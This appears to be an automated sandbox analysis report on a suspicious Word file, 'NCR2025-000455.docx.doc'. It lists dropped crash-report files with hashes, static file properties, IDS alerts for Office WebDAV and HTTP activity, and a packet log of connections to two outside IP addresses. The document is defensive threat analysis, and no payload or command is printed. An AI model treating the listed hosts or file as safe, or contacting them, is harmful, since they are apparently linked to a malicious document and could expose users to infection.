                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WINWORD.EXE_a1c61862db6fec6b4b15434cb236627a7a513e_c02cab6c_65615693-da40-4e86-bf45-eb646031c673\Report.wer

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (2251), with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):2.1441269672034005
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:pZer9H0TbjxR7FXRo2Arm0BGAOJ7UKGWauu7FC14lrJVGB:pE9H03jLFBoZ5uu7FC14lrK
                                                                                                                                                                                          MD5:EA1797221DF8221DDD0D8CAD6D98987F
                                                                                                                                                                                          SHA1:14C553EFE16244E0E85EE1ABD69F772B80A814B2
                                                                                                                                                                                          SHA-256:46FE002A5FD7CFE27A8BCEAB7EE6911C0B36644B5C7004BF798E1C1C82CE9556
                                                                                                                                                                                          SHA-512:1225558AB3D9C0684CB948BABD8ED4F301B91E7C0FA68CFB99BC2983BEC6DC8BF3FED4A746A39C9C583B6D821BCB0064AE78B3B52CC94C91FFC1101EDF2121CC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.4.2.0.9.9.4.7.4.2.8.5.7.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.4.2.0.9.9.4.8.8.3.4.8.2.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.6.1.5.6.9.3.-.d.a.4.0.-.4.e.8.6.-.b.f.4.5.-.e.b.6.4.6.0.3.1.c.6.7.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.2.7.3.4.f.4.-.6.4.7.c.-.4.6.9.f.-.9.8.6.9.-.3.d.2.8.e.2.0.7.a.d.4.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.W.I.N.W.O.R.D...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.W.i.n.W.o.r.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.4.4.-.0.0.0.1.-.0.0.0.f.-.7.6.0.6.-.6.a.2.1.a.e.8.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.b.b.d.9.0.a.1.4.9.4.1.1.7.6.3.b.a.1.3.8.d.d.c.2.f.1.7.3.1.b.7.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.d.e.a.f.1.2.0.1.9.4.3.7.9.0.3.e.8.6.c.5.a.8.3.1.c.d.7.8.4.3.a.7.5.2.0.9.7.0.!.W.I.N.W.O.R.D...E.X.E.....T.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER.0db5bd23-b4b1-4000-9069-6b01b0e420e5.tmp.WERInternalMetadata.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (380), with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13416
                                                                                                                                                                                          Entropy (8bit):3.758759362868515
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:RHlnNzawaMKxaMYIMINiaMYIMINca4pJz6YdFgmf88P06GhffU:RHlNKYIMIN7IMINQx8i
                                                                                                                                                                                          MD5:F80E9E735F77D3F52266E164314610B6
                                                                                                                                                                                          SHA1:EE0954CCA98E479F31F479E0891DD78C327827FF
                                                                                                                                                                                          SHA-256:F4515C28EE0CE01C0EA69672C8CF16CDDC30AA142B1DECC93C1D47E970100AC9
                                                                                                                                                                                          SHA-512:9D3C76D09773D1A613E6502DB4149A86EB21D221FDB5321411632833840B70FEE7E47CF685067BDEF01F9203528B85E6131CBF26D1427FF2636EFD7C710F332A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.2.2.6.3.1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.2.2.6.2.1...4.1.6.9...a.m.d.6.4.f.r.e...n.i._.r.e.l.e.a.s.e...2.2.0.5.0.6.-.1.2.5.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.4.1.6.9.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.........<.B.u.i.l.d.L.a.y.e.r.s.>...........<.B.u.i.l.d.L.a.y.e.r. .L.a.y.e.r.N.a.m.e.=.".2.2.6.2.1...1...a.m.d.6.4.f.r.e...n.i._.r.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER.477c0328-c5bc-446e-bb1f-672e58c74242.tmp.dmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Sun Feb 16 20:05:48 2025, 0x1205a4 type
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):703638
                                                                                                                                                                                          Entropy (8bit):1.9693738136921426
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:EvjFlX2eZi+c1MVtOaC8/iq4jFEU5qmtiWun6F7:Evj/X2exNViq4j9cZ0
                                                                                                                                                                                          MD5:37937212540EF655951B0B3D9CA043E4
                                                                                                                                                                                          SHA1:087C61C1EA72DC129718362C2934C4C680A92C21
                                                                                                                                                                                          SHA-256:1404522B23FFF4EC24E86E498BB742019B77D9CC9C18ED0824F63174AE6BE1E6
                                                                                                                                                                                          SHA-512:0C594496EDDEC0A62E44F30D2A068BD07193ABBC5735AE2A611131F9819F517378F24EA775DEE1CC3770F591673434F434F45F30E8577E083AE5E850B55B9668
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:MDMP..]..... ........E.g........................hA..............\N...........P..........F...........l.......8...........T............................^...........`..............................................................................gX......da......Lw...............*......T.......D....E.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................2.2.6.2.1...1...a.m.d.6.4.f.r.e...n.i._.r.e.l.e.a.s.e...2.2.0.5.0.6.-.1.2.5.0...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bd05f971-1afa-4487-84bf-f1ccec6bff92.tmp.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (2272), with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):7866
                                                                                                                                                                                          Entropy (8bit):4.8903280268129325
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:uIZqy64+VM1HyL3/g9eT8OpByO7MsT5VDk9cadsfwtnVyyQDLyL:8X2BVaDLyL
                                                                                                                                                                                          MD5:3ED701CB66C4FC291310A69A62DFFD3F
                                                                                                                                                                                          SHA1:A16C5E432BF38940D41ABE89B7C51562D3B0C403
                                                                                                                                                                                          SHA-256:A2F2532ACD60905F39E888DC9B19315FC136BFDCD83B45BBAC72B0D68A06C655
                                                                                                                                                                                          SHA-512:63C60EEC178DA442275C4093B865ABB94EA75AC5F3B4AF92A63097A60D1336D5B16C3EACBD006A13139D8798C30FA4EBA2F7A0943A6B2ED56D9F45490E258E07
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="22631" />.. <arg nm="vercsdbld" val="4169" />.. <arg nm="verqfe" val="4169" />.. <arg nm="csdbld" val="4169" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="99475" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.1.22621.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096"

                                                                                                                                                                                          C:\Users\user\Desktop\~$R2025-000455.docx.doc

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):162
                                                                                                                                                                                          Entropy (8bit):2.948333207411505
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:blRmMcPlPSVl0lBl/ll/l/ll5IblvDxN:bzmMcPlP0cBl/Hl/lb67
                                                                                                                                                                                          MD5:C1BFB5DB25F6D5BB64D78972729CBCF4
                                                                                                                                                                                          SHA1:AC78021B04CBD5A3703BB21094ED34A99B5DBB2B
                                                                                                                                                                                          SHA-256:3250722C53FB234AEC75D89C78A800584A4A2FF1F8E24F5B81ACB2AF97945943
                                                                                                                                                                                          SHA-512:29174D3D637592B18E091E712C82B01A0467F693FFED22C84FB6522D164AC12E46E672871942BCB0D7C839E5E63A1EFF045DBD13FFE92C1547701BCA13C617AB
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:.user..................................................M.a.o.g.a.......u.....07.L....07.L....Ri......................Ri.......BZ!............(.%............6.g.

                                                                                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):786432
                                                                                                                                                                                          Entropy (8bit):3.5269292118666113
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:1F11OBtBjJcU0RqqYJyXuB75kyNIGFuYFU/v701PfILyH/zoSS:1yjFyeB75c4V1
                                                                                                                                                                                          MD5:ABB04CE40F7C521B44EA7DAAA896164A
                                                                                                                                                                                          SHA1:1CA6E6261DAA52456E2469F265D825F0E66EE4B1
                                                                                                                                                                                          SHA-256:664C74781179A400BEA1E819C6F91EAF40F12B5A3B9D76EB38B04A905B8517C7
                                                                                                                                                                                          SHA-512:8C32D4EF19AFB952864A82230BF8815263EF8F4D4C9F2370625D1E25A0CFE4DB80F25D67474B51F1FE4905E1ABAC184C4DE89021688EE9927BD098CAC1CC92C0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:regfq...q...w.k.eJ.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......X.......n......X.......n..........X.......n...rmtm.e.)................................................................................................................................................................................................................................................................................................................................................k..p........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:Microsoft Word 2007+
                                                                                                                                                                                          Entropy (8bit):7.968806624702479
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                                                                                                                                                                                          • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                                                                                                                                                                                          • ZIP compressed archive (8000/1) 9.41%
                                                                                                                                                                                          File name:NCR2025-000455.docx.doc
                                                                                                                                                                                          File size:92'498 bytes
                                                                                                                                                                                          MD5:bc0ab291694ec67aad2ef22cb680df22
                                                                                                                                                                                          SHA1:aa0ee7bbb4f883bfe7b6f824181609f309d83ba1
                                                                                                                                                                                          SHA256:cc46628096b1c48f36accd498026b5080b7714de6081359af69503583023eaf7
                                                                                                                                                                                          SHA512:8bd9acdb3e28761bc68417ce1253ec9a10f3ddfdcec379d81288a6004bbf28af2e72f3ae00a59084311f4411e9ac4083244ba79cd97db0b5fd754b9ae04b502d
                                                                                                                                                                                          SSDEEP:1536:k0KWVLJ7fOlHWXxgppm1aTntfH+bawzF9rL7inTUWskbg:k0XVLJ7fiWXxgppm1QBybFxLmTUWskE
                                                                                                                                                                                          TLSH:3893F13F482A2476D781D1B70291AA1CC1107B4BAE6735369C3B8FF9D4F6047EB25A2C
                                                                                                                                                                                          File Content Preview:PK.........sMZ................[Content_Types].xmlUT...]..g]..g]..g.VKk.@......^..v....9..1.4.....Z./v&...;k9..Tr.._$..{.c.]\..-^ .....j&..M...j.....".$....C-6..jy.i......=..#._........<G...".L+.U..V /f......SI.C,.wl ....Jt.......lC ...b:Q\..,]...5."6._.~'

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:35e1cc889a8a8599

                                                                                                                                                                                          Static OLE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Document Type:OpenXML
                                                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                                                          OLE File "NCR2025-000455.docx.doc"

                                                                                                                                                                                          Indicators
                                                                                                                                                                                          Has Summary Info:
                                                                                                                                                                                          Application Name:
                                                                                                                                                                                          Encrypted Document:False
                                                                                                                                                                                          Contains Word Document Stream:True
                                                                                                                                                                                          Contains Workbook/Book Stream:False
                                                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                                                          Contains ObjectPool Stream:False
                                                                                                                                                                                          Flash Objects Count:0
                                                                                                                                                                                          Contains VBA Macros:False

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Download Network PCAP: filteredfull

                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                          2025-02-16T21:05:40.981983+01001810005Joe Security ANOMALY Microsoft Office WebDAV Discovery1192.168.2.2453973142.132.211.198443TCP
                                                                                                                                                                                          2025-02-16T21:05:43.446574+01001810004Joe Security ANOMALY Microsoft Office HTTP activity1192.168.2.2453978142.132.211.198443TCP
                                                                                                                                                                                          2025-02-16T21:05:43.967600+01001810004Joe Security ANOMALY Microsoft Office HTTP activity1192.168.2.245397967.217.247.19380TCP

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          • Total Packets: 191
                                                                                                                                                                                          • 443 (HTTPS)
                                                                                                                                                                                          • 80 (HTTP)
                                                                                                                                                                                          • 53 (DNS)
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Feb 16, 2025 21:05:38.962707043 CET53971443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:38.962748051 CET44353971142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:38.962805986 CET53971443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:38.963951111 CET53971443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:38.963973045 CET44353971142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:39.708506107 CET44353971142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:39.708607912 CET53971443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:39.711986065 CET53971443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:39.711997986 CET44353971142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:39.712420940 CET44353971142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:39.719786882 CET53971443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:39.767326117 CET44353971142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:39.985357046 CET44353971142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:39.985450983 CET44353971142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:39.985641956 CET53971443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:39.986233950 CET53971443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:39.986268997 CET44353971142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.044109106 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.044152021 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.044231892 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.045017004 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.045032978 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.692722082 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.695697069 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.701345921 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.701364040 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.702775002 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.702863932 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.704477072 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.704562902 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.704627991 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.704638004 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.704699039 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.707416058 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.755337000 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.982017994 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.982083082 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.982115030 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.982208014 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.982254982 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.985601902 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.985622883 CET44353973142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:40.985635042 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:40.985922098 CET53973443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:41.004159927 CET53975443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:41.004195929 CET44353975142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.004272938 CET53975443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:41.004499912 CET53975443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:41.004517078 CET44353975142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.652441978 CET44353975142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.653055906 CET53975443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:41.653086901 CET44353975142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.661691904 CET53975443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:41.661699057 CET44353975142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.877017975 CET44353975142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.877093077 CET44353975142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.877199888 CET53975443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:41.877993107 CET53975443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:41.878017902 CET44353975142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.878045082 CET53975443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:41.878052950 CET44353975142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.883838892 CET5397780192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:41.888693094 CET805397767.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:41.888786077 CET5397780192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:41.888931990 CET5397780192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:41.893786907 CET805397767.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:42.430109978 CET805397767.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:42.487170935 CET5397780192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:42.500087976 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:42.500202894 CET44353978142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:42.500292063 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:42.501651049 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:42.501686096 CET44353978142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.155137062 CET44353978142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.155380964 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:43.156836987 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:43.156866074 CET44353978142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.157450914 CET44353978142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.157526016 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:43.158351898 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:43.158548117 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:43.158612013 CET44353978142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.158683062 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:43.446577072 CET44353978142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.446669102 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:43.446682930 CET44353978142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.446732044 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:43.447823048 CET53978443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:43.447865963 CET44353978142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.449471951 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.454276085 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.454348087 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.454515934 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.459275961 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967525005 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967600107 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967649937 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967686892 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967695951 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967729092 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967823982 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967859983 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967870951 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967904091 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967920065 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967953920 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967968941 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967988968 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.968002081 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.968022108 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.968040943 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.968056917 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.968071938 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.968105078 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.972526073 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.972579956 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.972594023 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.972621918 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.972651005 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:43.972693920 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054323912 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054373026 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054385900 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054409027 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054415941 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054442883 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054450035 CET5397980192.168.2.2467.217.247.193
